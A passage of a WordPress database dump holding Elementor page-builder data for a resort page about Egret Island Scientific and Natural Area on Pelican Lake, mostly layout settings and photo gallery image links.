ET ISLAND SCIENTIFIC AND NATURAL AREA<\\/strong><br \\/>A 34 acre island on Pelican Lake with an egret\\/ heron, one of the largest in Minnesota to protect nesting Herons, Egrets and Cormorants.<br \\/><strong>BEST TIMES TO VISIT<\\/strong>: May through July<br \\/><strong>BIRDS TO LOOK FOR:<\\/strong> Great Blue Heron, Great Egret, Black crowned Night Heron, Bald Eagles and many varieties of waterfall.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"652a9c0\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"941a68a\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"db1cd2c\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"77f2fe7\"}]},\"elements\":[{\"id\":\"907b353\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"8dff2d5\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"13e12df\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"79f88fc\"}]},\"elements\":[{\"id\":\"78339db\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2017\\/01\\/DSC0111cropped.jpg\",\"id\":334}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"24a8461\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"277c649\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"2776fcf\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"e46a15c\"}]},\"elements\":[{\"id\":\"35a87df\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2017\\/01\\/DSC0528.jpg\",\"id\":337}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"416845e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"f6c85c6\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"e9eb61f\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"2f7e666\"}]},\"elements\":[{\"id\":\"877051d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2017\\/01\\/DSC0428.jpg\",\"id\":485}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2afc1af\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"82265b8\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"61556d1\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"879b52c\"}]},\"elements\":[{\"id\":\"183922b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"159b541\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"9c0cb14\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"502233b\"}]},\"elements\":[{\"id\":\"e65066b\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2019\\/04\\/Screen-Shot-2019-04-09-at-8.12.40-PM.png\",\"id\":773}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"6484ac8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"5b682d2\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"6278ced\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"f10a619\"}]},\"elements\":[{\"id\":\"3611c11\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2017\\/01\\/DSCN3645.jpg\",\"id\":357}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"3512ca9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"85d8902\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"29fbccb\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"6cd8a18\"}]},\"elements\":[{\"id\":\"a981a86\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2017\\/01\\/DSCN3607.jpg\",\"id\":356}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7a786f0\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"a58d1af\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"4ffc419\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"631f271\"}]},\"elements\":[{\"id\":\"61eb0cf\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"c4c154c\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"9ad33c4\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"92a65b9\"}]},\"elements\":[{\"id\":\"6e7ea21\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2017\\/01\\/DSCN3381.jpg\",\"id\":352}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"210e62a\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"c9955f8\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"6af7ce6\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"dd4630f\"}]},\"elements\":[{\"id\":\"ea948a0\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2017\\/01\\/DSC0971.jpg\",\"id\":338}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"ddf3233\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"bab1281\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"ff057f3\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"260fb0c\"}]},\"elements\":[{\"id\":\"f85d395\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2016\\/03\\/DSCN2428.jpg\",\"id\":185}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"df56761\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"5f9df41\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"d7d61cf\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"616f81d\"}]},\"elements\":[{\"id\":\"d447070\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"73a82be\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"1d284f6\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"95bad3f\"}]},\"elements\":[{\"id\":\"0b1fe5a\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2016\\/03\\/DSCN2438.jpg\",\"id\":186}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"8ff0a4c\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"9282b83\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"9946c13\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"2df9de4\"}]},\"elements\":[{\"id\":\"efd238a\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2017\\/01\\/DSC0273.jpg\",\"id\":484}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"5b28a00\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"aa717c3\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"a627f24\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"f55fc3f\"}]},\"elements\":[{\"id\":\"33c1da6\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2017\\/01\\/DSCN3449.jpg\",\"id\":487}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"3c310c4\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"dc27ce8\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"52c6b37\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"2bc1f34\"}]},\"elements\":[{\"id\":\"136d8d2\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"f17526a\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"c1f4961\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"1de3965\"}]},\"elements\":[{\"id\":\"953ca0e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2019\\/04\\/Screen-Shot-2019-04-09-at-8.18.18-PM.png\",\"id\":774}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"8665d90\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"0c9f6ba\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"657872e\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"cccb494\"}]},\"elements\":[{\"id\":\"2c32f51\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2017\\/01\\/DSCN3325.jpg\",\"id\":486}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"9f8ffe1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"206e371\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"aaed728\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"302f717\"}]},\"elements\":[{\"id\":\"bcb10d3\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2019\\/04\\/Screen-Shot-2019-04-09-at-8.19.24-PM.png\",\"id\":775}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false}]'),(2040,777,'_wp_page_template','default'),(2041,777,'_elementor_edit_mode','builder'),(2042,777,'_elementor_template_type','post'),(2043,777,'_elementor_version','2.5.12'),(2044,777,'_elementor_page_settings','a:12:{s:21:\"background_color_stop\";a:3:{s:4:\"unit\";s:1:\"%\";s:4:\"size\";i:0;s:5:\"sizes\";a:0:{}}s:23:\"background_color_b_stop\";a:3:{s:4:\"unit\";s:1:\"%\";s:4:\"size\";i:100;s:5:\"sizes\";a:0:{}}s:25:\"background_gradient_angle\";a:3:{s:4:\"unit\";s:3:\"deg\";s:4:\"size\";i:180;s:5:\"sizes\";a:0:{}}s:15:\"background_xpos\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";i:0;s:5:\"sizes\";a:0:{}}s:22:\"background_xpos_tablet\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";i:0;s:5:\"sizes\";a:0:{}}s:22:\"background_xpos_mobile\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";i:0;s:5:\"sizes\";a:0:{}}s:15:\"background_ypos\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";i:0;s:5:\"sizes\";a:0:{}}s:22:\"background_ypos_tablet\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";i:0;s:5:\"sizes\";a:0:{}}s:22:\"background_ypos_mobile\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";i:0;s:5:\"sizes\";a:0:{}}s:19:\"background_bg_width\";a:3:{s:4:\"unit\";s:1:\"%\";s:4:\"size\";i:100;s:5:\"sizes\";a:0:{}}s:26:\"background_bg_width_tablet\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";s:0:\"\";s:5:\"sizes\";a:0:{}}s:26:\"background_bg_width_mobile\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";s:0:\"\";s:5:\"sizes\";a:0:{}}}'),(2045,777,'_elementor_data','[{\"id\":\"4e75edc\",\"elType\":\"section\",\"settings\":{\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"75e0b17\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"190ff24\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"e7f7f11\"}]},\"elements\":[{\"id\":\"d12d45f\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"e166c4f\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"825f625\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"4ecd425\"}]},\"elements\":[{\"id\":\"bcb8ee8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>EGRET ISLAND SCIENTIFIC AND NATURAL AREA<\\/strong><br \\/>A 34 acre island on Pelican Lake with an egret\\/ heron, one of the largest in Minnesota to protect nesting Herons, Egrets and Cormorants.<br \\/><strong>BEST TIMES TO VISIT<\\/strong>: May through July<br \\/><strong>BIRDS TO LOOK FOR:<\\/strong> Great Blue Heron, Great Egret, Black crowned Night Heron, Bald Eagles and many varieties of waterfall.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"652a9c0\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"941a68a\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"db1cd2c\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"77f2fe7\"}]},\"elements\":[{\"id\":\"907b353\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"8dff2d5\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"13e12df\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"79f88fc\"}]},\"elements\":[{\"id\":\"78339db\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2017\\/01\\/DSC0111cropped.jpg\",\"id\":334}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"24a8461\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"277c649\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"2776fcf\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"e46a15c\"}]},\"elements\":[{\"id\":\"35a87df\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2017\\/01\\/DSC0528.jpg\",\"id\":337}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"416845e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"f6c85c6\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"e9eb61f\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"2f7e666\"}]},\"elements\":[{\"id\":\"877051d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2017\\/01\\/DSC0428.jpg\",\"id\":485}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2afc1af\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"82265b8\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"61556d1\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"879b52c\"}]},\"elements\":[{\"id\":\"183922b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"159b541\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"9c0cb14\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"502233b\"}]},\"elements\":[{\"id\":\"e65066b\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2019\\/04\\/Screen-Shot-2019-04-09-at-8.12.40-PM.png\",\"id\":773}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"6484ac8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"5b682d2\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"6278ced\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"f10a619\"}]},\"elements\":[{\"id\":\"3611c11\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2017\\/01\\/DSCN3645.jpg\",\"id\":357}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"3512ca9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"85d8902\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"29fbccb\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"6cd8a18\"}]},\"elements\":[{\"id\":\"a981a86\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2017\\/01\\/DSCN3607.jpg\",\"id\":356}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7a786f0\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"a58d1af\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"4ffc419\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"631f271\"}]},\"elements\":[{\"id\":\"61eb0cf\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"c4c154c\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"9ad33c4\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"92a65b9\"}]},\"elements\":[{\"id\":\"6e7ea21\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2017\\/01\\/DSCN3381.jpg\",\"id\":352}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"210e62a\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"c9955f8\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"6af7ce6\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"dd4630f\"}]},\"elements\":[{\"id\":\"ea948a0\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2017\\/01\\/DSC0971.jpg\",\"id\":338}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"ddf3233\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"bab1281\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"ff057f3\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"260fb0c\"}]},\"elements\":[{\"id\":\"f85d395\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2016\\/03\\/DSCN2428.jpg\",\"id\":185}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"df56761\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"5f9df41\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"d7d61cf\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"616f81d\"}]},\"elements\":[{\"id\":\"d447070\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"73a82be\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"1d284f6\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"95bad3f\"}]},\"elements\":[{\"id\":\"0b1fe5a\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2016\\/03\\/DSCN2438.jpg\",\"id\":186}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"8ff0a4c\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"9282b83\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"9946c13\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"2df9de4\"}]},\"elements\":[{\"id\":\"efd238a\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2017\\/01\\/DSC0273.jpg\",\"id\":484}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"5b28a00\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"aa717c3\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"a627f24\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"f55fc3f\"}]},\"elements\":[{\"id\":\"33c1da6\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2017\\/01\\/DSCN3449.jpg\",\"id\":487}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"3c310c4\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"dc27ce8\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"52c6b37\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"2bc1f34\"}]},\"elements\":[{\"id\":\"136d8d2\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"f17526a\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"c1f4961\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"1de3965\"}]},\"elements\":[{\"id\":\"953ca0e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2019\\/04\\/Screen-Shot-2019-04-09-at-8.18.18-PM.png\",\"id\":774}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"8665d90\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"0c9f6ba\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"657872e\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"cccb494\"}]},\"elements\":[{\"id\":\"2c32f51\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2017\\/01\\/DSCN3325.jpg\",\"id\":486}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"9f8ffe1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"206e371\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"aaed728\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"302f717\"}]},\"elements\":[{\"id\":\"bcb10d3\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2019\\/04\\/Screen-Shot-2019-04-09-at-8.19.24-PM.png\",\"id\":775}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false}]'),(2048,778,'_wp_page_template','default'),(2049,778,'_elementor_edit_mode','builder'),(2050,778,'_elementor_template_type','post'),(2051,778,'_elementor_version','2.5.12'),(2052,778,'_elementor_page_settings','a:12:{s:21:\"background_color_stop\";a:3:{s:4:\"unit\";s:1:\"%\";s:4:\"size\";i:0;s:5:\"sizes\";a:0:{}}s: